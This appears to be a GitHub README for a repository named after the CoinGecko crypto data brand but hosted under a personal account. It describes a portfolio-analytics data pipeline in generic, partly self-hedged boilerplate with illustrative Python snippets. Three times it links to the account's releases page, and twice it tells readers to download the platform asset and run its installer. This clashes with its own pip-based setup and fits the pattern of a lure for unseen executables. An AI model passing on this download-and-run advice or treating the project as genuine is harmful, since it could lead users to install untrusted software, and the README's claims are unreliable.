CoinGecko: Orchestrated Crypto Data Pipeline for Portfolio Analytics

Visit releases page: https://github.com/Evanlum2011/CoinGecko/releases


Table of contents

  • Overview
  • Why this project exists
  • Core concepts and data model
  • Architecture and components
  • Data ingestion and processing workflow
  • Data storage, access, and querying
  • API, SDKs, and tooling
  • Deployment and operations
  • Quality, testing, and security
  • Extensibility and customization
  • Community and governance
  • Roadmap
  • Contributing
  • License and credits

Overview

CoinGecko is a cryptocurrency data orchestration platform designed for multi-asset portfolio analysis and historical data querying. It pulls data from reliable crypto sources, curates it into a consistent structure, and exposes it through accessible interfaces for analytics, research, and decision making. The system is built to handle a variety of assets, time ranges, and market conditions, while keeping data lineage clear and query performance predictable.

The project aims to provide a single, coherent data layer for portfolio analytics. It supports time-series queries, cross-asset comparisons, and historical reconstruction. It is designed to scale as the number of assets grows, as the volume of data increases, and as new data sources arise. The core value is speed, reliability, and clarity when it comes to turning raw market data into actionable insights.

Why this project exists

  • Portfolio managers need accurate, timely, and verifiable data across a broad set of assets. CoinGecko offers a unified data layer that reduces integration friction for research teams.
  • Analysts require efficient access to historical data for backtesting strategies, risk assessment, and performance attribution. The system provides robust historical querying capabilities.
  • Developers want a clean API and predictable data contracts. The platform exposes consistent schemas, versioned endpoints, and broad configurability to fit different workflows.

Core concepts and data model

  • Asset: represents a crypto asset with a unique identifier, symbol, name, and metadata. Assets can be primary (Bitcoin, Ethereum) or paired (stablecoins, tokens).
  • MarketDataPoint: a single data snapshot for an asset at a given timestamp. Key fields include open, high, low, close, volume, market_cap, and source.
  • HistoryBundle: a collection of MarketDataPoints across multiple assets for a defined period, used for batch analytics and time-aligned queries.
  • Portfolio: a user-defined collection of assets with allocations, rebalancing rules, and performance tracking.
  • Query: a request for historical data or current state, with parameters such as date range, granularity, and asset filters.
  • Source: the origin of data (for example CoinGecko, other providers). Data provenance is stored for traceability.
  • Snapshot: a point-in-time export of a dataset, used for auditing, reproducibility, and debugging.
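
As a rough illustration, the data model above could be sketched in Python as plain dataclasses. Field names follow the descriptions in this section; the actual classes in the codebase may be named and typed differently.

```python
from dataclasses import dataclass, field
from datetime import datetime
from typing import Optional


@dataclass(frozen=True)
class Asset:
    """A crypto asset with identity and descriptive metadata."""
    id: str                                  # unique identifier, e.g. "bitcoin"
    symbol: str                              # ticker symbol, e.g. "BTC"
    name: str                                # human-readable name
    metadata: dict = field(default_factory=dict)


@dataclass(frozen=True)
class MarketDataPoint:
    """A single data snapshot for one asset at one timestamp."""
    asset_id: str
    timestamp: datetime
    open: float
    high: float
    low: float
    close: float
    volume: float
    market_cap: Optional[float]
    source: str                              # provenance, e.g. "coingecko"
```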

Architecture and components

  • Orchestrator: coordinates data flow, scheduling, retries, and fault handling. It aligns data pulls with the chosen cadence and ensures data freshness.
  • Ingestors: dedicated modules that fetch data from CoinGecko and other sources. Each ingestor understands the API quirks of a source, handles rate limits, and normalizes data into the canonical schema.
  • Transformers: transform raw feed data into a clean, unified representation. They enforce consistency rules, unit normalization, and time alignment across assets.
  • Store: a layered storage system with a data lake for raw data, an analytics layer for clean, query-ready data, and a history store for time-series data. The architecture favors append-only storage and immutable records to preserve history.
  • API Layer: exposes data via REST endpoints and optional GraphQL-like queries. It returns time-aligned data, aggregates, and derived metrics on demand.
  • CLI and SDKs: command-line tools and language bindings to fetch, transform, and analyze data programmatically. They enable automation and rapid experimentation.
  • Observability: logging, metrics, and tracing to track pipeline health, data quality, and performance. This view helps operators diagnose issues quickly.
  • Security and governance: role-based access, encrypted storage, and policy enforcement to protect sensitive data and ensure compliance with project standards.
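
A minimal sketch of how the components above might fit together, assuming Python. The interface and function names here are illustrative, not the project's actual classes.

```python
from typing import Iterable, Protocol


class Ingestor(Protocol):
    """Fetches raw payloads from one data source."""
    def fetch(self, assets: list[str]) -> Iterable[dict]: ...


class Transformer(Protocol):
    """Normalizes raw payloads into the canonical schema."""
    def transform(self, raw: dict) -> dict: ...


class Store(Protocol):
    """Append-only storage for raw and cleaned records."""
    def append_raw(self, record: dict) -> None: ...
    def append_clean(self, record: dict) -> None: ...


def run_once(ingestor: Ingestor, transformer: Transformer, store: Store,
             assets: list[str]) -> None:
    """One orchestrated pass: pull raw data, keep lineage, store cleaned rows."""
    for raw in ingestor.fetch(assets):
        store.append_raw(raw)                          # preserve provenance
        store.append_clean(transformer.transform(raw))
```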

Data ingestion and processing workflow

  • Scheduling: the orchestrator triggers ingestion tasks at set intervals or on-demand for ad hoc pulls. Timing respects API rate limits and reserve windows for high-priority pulls.
  • Data collection: ingestors query data sources, collect payloads, and store raw records with timestamps and provenance.
  • Normalization: transformers convert incoming data into a consistent schema. They standardize units (e.g., USD, BTC-based values), align timestamps, and clean anomalies.
  • Validation: validators run checks for data completeness, range correctness, and schema conformance. Any anomalies are logged and surfaced to operators.
  • Enrichment: derived metrics are calculated, such as volume-weighted price, moving averages, and volatility estimates. Enrichment adds value without mutating the underlying data.
  • Storage: raw data lands in the data lake with a precise lineage, while cleaned data sits in the analytics store. Time-series data is organized to support fast queries and efficient compaction.
  • Serving: API endpoints and SDK methods return data to clients. Queries can request historical slices, current state, or aggregates across assets.
  • Observability: metrics and traces feed dashboards. Data quality dashboards highlight gaps, drift, and inconsistencies.
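
A rough sketch of the normalization and validation steps described above. The raw payload shape (`id`, `ts`, `o`, `h`, `l`, `c`, `v`) is a hypothetical example; real source fields will differ.

```python
from datetime import datetime, timezone

REQUIRED = ("open", "high", "low", "close", "volume")


def normalize(raw: dict) -> dict:
    """Map a raw payload into the canonical schema: UTC timestamps, float values."""
    return {
        "asset_id": raw["id"],
        "timestamp": datetime.fromtimestamp(raw["ts"], tz=timezone.utc),
        "open": float(raw["o"]),
        "high": float(raw["h"]),
        "low": float(raw["l"]),
        "close": float(raw["c"]),
        "volume": float(raw["v"]),
        "source": raw.get("source", "coingecko"),
    }


def validate(point: dict) -> list[str]:
    """Return a list of data-quality problems; an empty list means the point passes."""
    problems = [f"missing {k}" for k in REQUIRED if point.get(k) is None]
    if not problems and not (point["low"] <= point["open"] <= point["high"]
                             and point["low"] <= point["close"] <= point["high"]):
        problems.append("OHLC values out of range")
    return problems
```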

Data storage, access, and querying

  • Data lake: stores raw ingest payloads, preserving original structure for auditability. Access is controlled and logs are kept for traceability.
  • Analytics layer: holds cleaned, normalized data ready for analysis. It uses a columnar format to speed up aggregations and windowed calculations.
  • Time-series store: optimized for time-aligned queries across assets. It supports high-throughput reads and efficient rollups.
  • Indexing and partitions: data is partitioned by asset and time window. Proper indexing speeds up common queries such as “get all prices for asset X within date range.”
  • Data retention: rules define how long raw versus clean data is kept, how frequently it is compacted, and when old partitions are archived.
  • Access patterns: the API supports time-bounded queries, cross-asset comparisons, and down-sampled data for dashboards. Historical queries can reconstruct performance across multiple periods.
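
To make partition pruning concrete, here is a small sketch that assumes the analytics layer is Parquet with Hive-style partitions readable via pyarrow; the actual storage engine and layout are not specified here.

```python
import pyarrow.dataset as ds

# Assumed lake layout (illustrative): lake/asset=BTC/date=2023-01-01/part-0.parquet
dataset = ds.dataset("lake/", format="parquet", partitioning="hive")

# Partition pruning: only files for BTC within the requested window are read.
table = dataset.to_table(
    filter=(ds.field("asset") == "BTC")
    & (ds.field("date") >= "2023-01-01")
    & (ds.field("date") <= "2023-12-31")
)
print(table.num_rows)
```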

API, SDKs, and tooling

  • REST API: predictable endpoints for assets, market data, and portfolio analytics. It supports paging, filtering, and aggregation.
  • GraphQL-like query support: optional, for advanced users who want flexible data shapes without multiple round trips.
  • SDKs: language bindings for Python, JavaScript, and other popular ecosystems. They simplify authentication, data retrieval, and transformation.
  • CLI: a set of commands to fetch data, run local analytics, and validate data integrity. It helps automate workflows and reproduce results.
  • Documentation: clear references for data models, endpoints, and examples. Each endpoint includes input validation rules and sample responses.
  • Examples gallery: ready-to-run scripts that demonstrate common tasks, such as building a portfolio snapshot, comparing assets over a period, or validating historical accuracy.

Deployment and operations

  • Containerized components: services are packaged as containers for consistent deployment. This approach simplifies setup and versioning.
  • Orchestration: deployment can run on Docker Compose for small setups or Kubernetes for large-scale deployments. Operators can scale components independently.
  • Configuration management: environment variables and config files control endpoints, credentials, and processing parameters. Secrets are stored securely following best practices.
  • Observability and alerts: dashboards track throughput, latency, and error rates. Alerts notify operators when data quality falls outside expected ranges.
  • Backup and recovery: regular backups cover raw data, analytics layers, and configuration. Recovery procedures are tested and documented.
  • Upgrades: new releases add features and fix issues without breaking existing pipelines. Versioning and migration scripts preserve backward compatibility where possible.
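
A minimal illustration of environment-driven configuration as described above. The variable names are assumptions for the sketch, not the project's actual settings.

```python
import os
from dataclasses import dataclass


@dataclass(frozen=True)
class Settings:
    api_base_url: str
    ingest_interval_minutes: int
    database_url: str


def load_settings() -> Settings:
    """Read configuration from environment variables, with defaults for non-secrets."""
    return Settings(
        api_base_url=os.environ.get("COINGECKO_API_URL", "https://api.coingecko.com/api/v3"),
        ingest_interval_minutes=int(os.environ.get("INGEST_INTERVAL_MINUTES", "15")),
        database_url=os.environ["DATABASE_URL"],  # required; credentials get no default
    )
```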

Quality, testing, and security

  • Unit tests: validate individual components in isolation. They verify data parsing, normalization rules, and edge cases.
  • Integration tests: confirm end-to-end data flows from ingestion to serving. They simulate real-world loads and verify correctness under stress.
  • Data quality checks: automated checks compare sources, ensure no unexpected gaps, and flag anomalies for review.
  • Security posture: access control, encrypted storage, and secure credentials handling. Regular audits verify compliance with chosen security standards.
  • Dependency hygiene: pinned versions and automated updates reduce drift and vulnerabilities. Vulnerability scans run as part of CI.
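
A unit test in the style described above, assuming a normalize() function like the one sketched earlier is importable from the package; the module path is hypothetical.

```python
from datetime import timezone

import pytest

from coin_gecko.transformers import normalize  # hypothetical import path


def test_normalize_converts_units_and_timestamps():
    raw = {"id": "bitcoin", "ts": 1704067200, "o": "42000", "h": "43000",
           "l": "41000", "c": "42500", "v": "1000"}
    point = normalize(raw)
    assert point["asset_id"] == "bitcoin"
    assert point["timestamp"].tzinfo == timezone.utc
    assert point["high"] >= point["low"]


def test_normalize_rejects_malformed_payloads():
    with pytest.raises(KeyError):
        normalize({})  # missing required fields should fail loudly
```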

Extensibility and customization

  • Pluggable data sources: new data sources can be added as ingestors with minimal changes to the core pipeline. Each ingestor includes rate control and error handling tailored to the source.
  • Custom transforms: users can supply their own transformers to apply business-specific normalization or enrich data with external feeds.
  • Derived metrics: add new metrics to the analytics layer without altering core data. Metrics are computed on demand or materialized for speed.
  • Plugins and adapters: the system supports plugins that extend API capabilities, authentication schemes, or data formats.
  • Scripting and automation: a CLI and SDKs enable automation of repeatable tasks, such as nightly data pulls or portfolio rebalancing simulations.
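
One way the pluggable-source idea could look in Python; the base class and registry here are illustrative, not the project's actual plugin API.

```python
from abc import ABC, abstractmethod
from typing import Iterable


class BaseIngestor(ABC):
    """Contract that every data-source plugin implements."""
    source_name: str = "unknown"

    @abstractmethod
    def fetch(self, assets: list[str]) -> Iterable[dict]:
        """Yield raw payloads, respecting the source's rate limits."""


_REGISTRY: dict[str, type[BaseIngestor]] = {}


def register(cls: type[BaseIngestor]) -> type[BaseIngestor]:
    """Class decorator that makes a new source available to the pipeline."""
    _REGISTRY[cls.source_name] = cls
    return cls


@register
class CoinGeckoIngestor(BaseIngestor):
    source_name = "coingecko"

    def fetch(self, assets: list[str]) -> Iterable[dict]:
        # A real implementation would call the source API with backoff and rate limiting.
        return iter(())
```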

Community and governance

  • Open governance model: decisions are made transparently, with clear contribution guidelines. Maintainers review changes for impact on consistency and performance.
  • Documentation as a first-class artifact: every feature includes user-focused docs. Examples, tutorials, and edge-case notes help users adopt the platform quickly.
  • Issue handling: issues are tracked with clear templates. Each report includes reproduction steps, environment details, and expected vs. actual outcomes.
  • Code style and quality: coding standards emphasize readability, safety, and maintainability. Linters and formatters enforce consistency.

Roadmap

  • Data source diversification: bring in additional sources to improve coverage and cross-check data.
  • Real-time streaming: reduce latency by enabling near real-time ingestion for high-frequency markets.
  • Advanced analytics: add risk metrics, attribution models, and scenario analysis for portfolio decisions.
  • Visualization first-class support: richer dashboards with drag-and-drop widgets, time-range comparisons, and custom charts.
  • On-chain and alternative data: support for on-chain metrics, wallet analytics, and social sentiment feeds to complement price data.

Contributing

  • Style and conventions: follow the project’s contribution guidelines. Write clear, focused pull requests with tests where applicable.
  • Local setup: run the same versions of runtimes and dependencies used by CI. Keep changes isolated to a single feature or fix.
  • Testing locally: run unit and integration tests to ensure changes do not regress existing behavior.
  • Documentation: update or create docs for any user-facing changes. Include concise examples to illustrate new features.

Release management

  • Release cadence: monthly minor releases with a quarterly major release. Hotfixes appear as needed.
  • Release assets: each release bundles executables, container images, and documentation. Users should download the appropriate asset for their platform.
  • Selection of assets: assets are chosen to maximize compatibility, stability, and security. Always verify checksums when available.
  • Accessing releases: the official releases page hosts all artifacts and changelogs. Download the asset for your platform from the latest release and run its installer: https://github.com/Evanlum2011/CoinGecko/releases

Data governance and provenance

  • Provenance tracking: every data item retains source, ingest time, and transformation history. This makes audits straightforward.
  • Versioned schemas: data contracts evolve with backward-compatible changes whenever possible. Old data remains queryable against older schemas.
  • Data quality lineage: dashboards show data lineage, recent anomalies, and corrective actions taken.
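
A small sketch of provenance stamping as described above. The `_provenance` field name and helper are illustrative assumptions, not the project's actual schema.

```python
from datetime import datetime, timezone


def stamp_provenance(record: dict, source: str, step: str) -> dict:
    """Return a copy of the record with source, ingest time, and transform history attached."""
    prov = dict(record.get("_provenance") or {
        "source": source,
        "ingested_at": datetime.now(timezone.utc).isoformat(),
        "history": [],
    })
    prov["history"] = [*prov["history"], step]
    return {**record, "_provenance": prov}


# Usage: stamp at ingest, then again at each transform step.
raw = stamp_provenance({"asset_id": "bitcoin", "close": 42500.0}, "coingecko", "ingest")
clean = stamp_provenance(raw, "coingecko", "normalize_usd")
assert clean["_provenance"]["history"] == ["ingest", "normalize_usd"]
```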

Usage patterns and tutorials

  • Quick start: fetch a small set of assets, pull recent data, and view a simple time-series chart. This helps new users become productive fast.
  • Portfolio analytics workflow: start with a portfolio outline, pull historical prices, compute returns and risk metrics, then compare with a benchmark.
  • Historical queries: run time-bounded queries across multiple assets to study drawdowns, recoveries, and correlation changes.
  • Cross-asset comparisons: align data on common time windows and compute relative performance to identify leaders and laggards.

Data access controls

  • Role-based access: different roles grant varying levels of data access and administrative control.
  • Secret management: secrets live in a secure store and are rotated periodically.
  • Audit trails: every access and change is logged with user identity and timestamps.

Performance considerations

  • Caching: query results and common aggregations are cached to speed up frequent requests.
  • Partition pruning: time-based partitions ensure only relevant data is read.
  • Compression: data is stored with lossless compression to save space without sacrificing accuracy.
  • Horizontal scaling: the architecture scales out by adding more processing nodes as data volume grows.

Common workflows

  • New data source onboarding: add an ingestor for the source, map its fields to the canonical schema, and verify data quality on first run.
  • Backfilling: run a backfill to populate historical data for a new asset or a new time range.
  • Backtesting support: use historical data to simulate strategies and compare results across assets.
  • Data drift monitoring: compare recent data to historical baselines to detect anomalies or source changes.

Integrations and ecosystem

  • External tooling: the platform integrates with analytics notebooks, data visualization tools, and BI platforms.
  • Data exports: users can export time-series data to CSV, Parquet, or JSON for external analysis.
  • Community modules: third-party modules extend the platform with new data sources, derived metrics, or visualization widgets.

Common design decisions

  • Simplicity first: the core pipeline favors simplicity and reliability over feature bloat.
  • Clear data contracts: schemas are explicit, with explicit field definitions and types.
  • Deterministic processing: transforms are deterministic, making results reproducible.
  • Observability by default: metrics, logs, and traces are always collected.

Getting started

Prerequisites

  • Python 3.9 or later
  • Docker or Podman for containerized deployment
  • Git for source control
  • A modern Linux, macOS, or Windows environment with WSL2 if needed

Installation

  • Clone the repository
  • Create a virtual environment
    • python -m venv venv
    • source venv/bin/activate (or venv\Scripts\activate on Windows)
  • Install dependencies
    • pip install -r requirements.txt
  • Optional: install data tools if you want local notebooks or dashboards
    • pip install jupyterlab

Running locally

  • Start the orchestrator in development mode
    • python -m coin_gecko.orchestrator --env dev
  • Run a quick ingest for a small set of assets
    • python -m coin_gecko.ingest --assets BTC,ETH,ADA --limit 1000
  • Query a sample dataset
    • python -m coin_gecko.query --asset BTC --start 2023-01-01 --end 2023-12-31

Using Docker
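
Assuming the repository ships a docker-compose.yml (not verified here), a typical containerized workflow would be:

  • Build the images
    • docker compose build
  • Start the services in the background
    • docker compose up -d
  • For larger deployments, the same images can run on Kubernetes as described under Deployment and operations.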

Working with the API

  • List assets
    • GET /api/v1/assets
  • Get historical data
    • GET /api/v1/market-data?asset=BTC&start=2023-01-01&end=2023-12-31
  • Get portfolio analytics
    • GET /api/v1/portfolio/analytics?portfolio_id=default&period=1y
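
The endpoints above could be called from Python roughly as follows; the base URL, authentication, and response shape are placeholders for this sketch.

```python
import requests

BASE = "http://localhost:8000"  # placeholder; use your deployment's base URL

# Historical data for BTC over 2023, matching the endpoint shown above.
resp = requests.get(
    f"{BASE}/api/v1/market-data",
    params={"asset": "BTC", "start": "2023-01-01", "end": "2023-12-31"},
    timeout=30,
)
resp.raise_for_status()
for point in resp.json():  # response shape assumed: a list of OHLCV records
    print(point["timestamp"], point["close"])
```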

Examples and recipes

  • Build a cross-asset dashboard
    • Pull time-series data for major assets
    • Compute correlations and rolling returns
    • Visualize side-by-side charts for quick comparison
  • Backtest a simple strategy
    • Retrieve historical prices
    • Apply a moving-average crossover rule
    • Measure performance, drawdowns, and risk metrics
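
A compact pandas illustration of the moving-average crossover recipe above. It assumes you already have a daily close-price series, however you obtained it.

```python
import pandas as pd


def ma_crossover_backtest(close: pd.Series, fast: int = 20, slow: int = 50) -> pd.DataFrame:
    """Long when the fast MA is above the slow MA, flat otherwise."""
    out = pd.DataFrame({"close": close})
    out["fast"] = close.rolling(fast).mean()
    out["slow"] = close.rolling(slow).mean()
    # Shift by one bar so today's signal trades tomorrow (no look-ahead).
    out["position"] = (out["fast"] > out["slow"]).astype(int).shift(1).fillna(0)
    out["returns"] = close.pct_change().fillna(0) * out["position"]
    out["equity"] = (1 + out["returns"]).cumprod()
    out["drawdown"] = out["equity"] / out["equity"].cummax() - 1
    return out


# Usage with any daily close series indexed by date:
# result = ma_crossover_backtest(prices["close"])
# print(result[["equity", "drawdown"]].tail())
```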

Data sources and reliability

  • Primary source: CoinGecko provides broad coverage of crypto assets and markets.
  • Secondary sources: supplemental feeds may be added to improve coverage and validation.
  • Data quality controls ensure consistency across sources, with provenance kept for every record.

Security and compliance

  • Access control to APIs and internal services regulates who can read or modify data.
  • Data at rest is encrypted, and credentials are rotated on a schedule.
  • Regular security reviews check for vulnerabilities and update dependencies accordingly.

Tuning and operations

  • Performance tuning comes from partitioning strategies, caching, and efficient query planning.
  • Operators tune ingest schedules to balance freshness with rate limits.
  • Observability dashboards show latency, error rates, and data drift in near real time.

Technical debt and maintenance

  • The team tracks debt items in an issue board. Each item has a clear owner, a scope, and a completion plan.
  • Refactors target the most brittle parts of the pipeline, improving testability and reliability.
  • Deprecations are announced with migration paths and timelines to minimize disruption.

Changelog philosophy

  • Every release includes a brief changelog with features, fixes, and breaking changes if any.
  • Users are encouraged to review release notes before upgrading and to test in a staging environment.

FAQ

  • How do I add a new asset?
    • Add an asset definition, create or update an ingestor for the asset’s data source, run a backfill, and validate.
  • How is historical data aligned across assets?
    • Data points are aligned by timestamp to enable precise cross-asset comparisons.
  • Can I switch data sources?
    • Yes. Ingestors are designed to switch sources with minimal changes to downstream processing.
  • Is the API stable?
    • The API follows versioning rules. Changes to endpoints are documented and announced.

Credits and acknowledgments

  • Core contributors and maintainers are acknowledged in the project docs.
  • The project appreciates the open-source community for ideas, tests, and feedback.
  • Acknowledgments go to data source providers who offer accessible data for research and development.

Releases and assets

  • The official releases page hosts binaries, container images, and documentation for each version. Download the asset for your platform from the latest release and run its installer: https://github.com/Evanlum2011/CoinGecko/releases

Appendix: architecture visuals and diagrams

  • Data flow diagram showing ingestion, transformation, storage, and serving layers
  • Asset and history schemas illustrating the time-series structure
  • Role-based access model and governance workflows

Notes on scope

  • This README emphasizes architecture, workflows, and practical usage for developers and operators.

